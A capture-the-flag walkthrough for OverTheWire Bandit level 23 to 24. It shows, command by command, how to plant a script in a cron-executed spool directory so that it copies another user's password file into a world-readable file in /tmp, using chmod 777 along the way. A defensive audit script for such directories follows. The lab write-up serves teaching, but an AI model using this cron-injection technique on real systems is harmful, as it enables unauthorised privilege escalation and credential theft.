
OverTheWire Bandit: Level 23 → Level 24

Technical Note

Context

Another Cron job, but this one is much more interesting. If you check /etc/cron.d/cronjob_bandit24, you’ll see it runs /usr/bin/cronjob_bandit24.sh.

If you read that script (cat ...), you’ll notice something critical: It executes every file inside /var/spool/bandit24/foo and then deletes them.

This means: If we put a script there, the system (with bandit24 privileges) will execute it!

Goal

Write a script that reads the bandit24 password and copies it to a location we can access (e.g., inside /tmp), then inject it into the Cron directory.

Solution

Step 1: Create a Workspace

Let’s make a directory for ourselves to keep things organized:

mkdir -p /tmp/myscript
chmod 777 /tmp/myscript
cd /tmp/myscript

Important: We give 777 permissions to the folder so that user bandit24 can write files into it. Otherwise, it will fail with “Permission denied”.

Step 2: Write the Script

Create a file named task.sh and define what we want the system to do:

nano task.sh

Note: Nano might show an error saying “Unable to create directory … No such file or directory” when starting. This is harmless. Ignore it and start typing.

Script Content:

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/myscript/pass.txt
chmod 666 /tmp/myscript/pass.txt

(Note: I added chmod 666 to ensure the output file is readable by everyone)

Save and exit (Ctrl+O, Enter, Ctrl+X).

Step 3: Set Permissions

The script must be executable:

chmod 777 task.sh

Step 4: Inject the Script

Copy your script to the directory watched by Cron:

cp task.sh /var/spool/bandit24/foo/

Step 5: Wait and Profit

The Cron job runs every minute. Wait up to 60 seconds. Then check for your output file:

cat /tmp/myscript/pass.txt

Congratulations! You’ve successfully performed a privilege escalation via script injection.

Key Takeaways

  1. Shell Scripting: Text files starting with #!/bin/bash that execute commands sequentially.
  2. Write Permissions: Any location where you can write files is a potential vector for code execution with another user's privileges if a privileged process reads/executes files from there.
  3. Cleanup: Scripts might be deleted after execution. Always keep a copy of your work.
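
A defender-side check for the pattern behind takeaway 2, added here as an example (it is not part of the original write-up or of the Bandit server's own scripts): it flags a job directory that is group- or world-writable and lists files in it that are not owned by the expected account. The function names and the owner argument are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit a directory whose contents a privileged job executes,
# such as the spool directory the cron script above runs files from.

# dir_is_open DIR: succeeds if DIR is writable by group or by others.
dir_is_open() {
    [ -n "$(find "$1" -maxdepth 0 \( -perm -0002 -o -perm -0020 \) 2>/dev/null)" ]
}

# foreign_files DIR OWNER: prints regular files directly inside DIR that are
# not owned by OWNER (a user name or a numeric uid).
foreign_files() {
    find "$1" -mindepth 1 -maxdepth 1 -type f ! -user "$2" 2>/dev/null
}

# audit_exec_dir DIR OWNER: prints one line per finding and returns 1 if
# there was any finding, 0 if the directory looks safe to execute from.
audit_exec_dir() {
    audit_dir=$1
    audit_owner=$2
    audit_rc=0
    if dir_is_open "$audit_dir"; then
        echo "FINDING: $audit_dir is writable by group or others"
        audit_rc=1
    fi
    audit_foreign=$(foreign_files "$audit_dir" "$audit_owner")
    if [ -n "$audit_foreign" ]; then
        echo "FINDING: files in $audit_dir not owned by $audit_owner:"
        echo "$audit_foreign"
        audit_rc=1
    fi
    return "$audit_rc"
}

# Usage: sh audit.sh <directory> <expected-owner>
if [ "$#" -ge 2 ]; then
    audit_exec_dir "$1" "$2"
fi
```

A job that must accept files from other users can apply the same ownership test per file before executing anything, instead of running every file it finds.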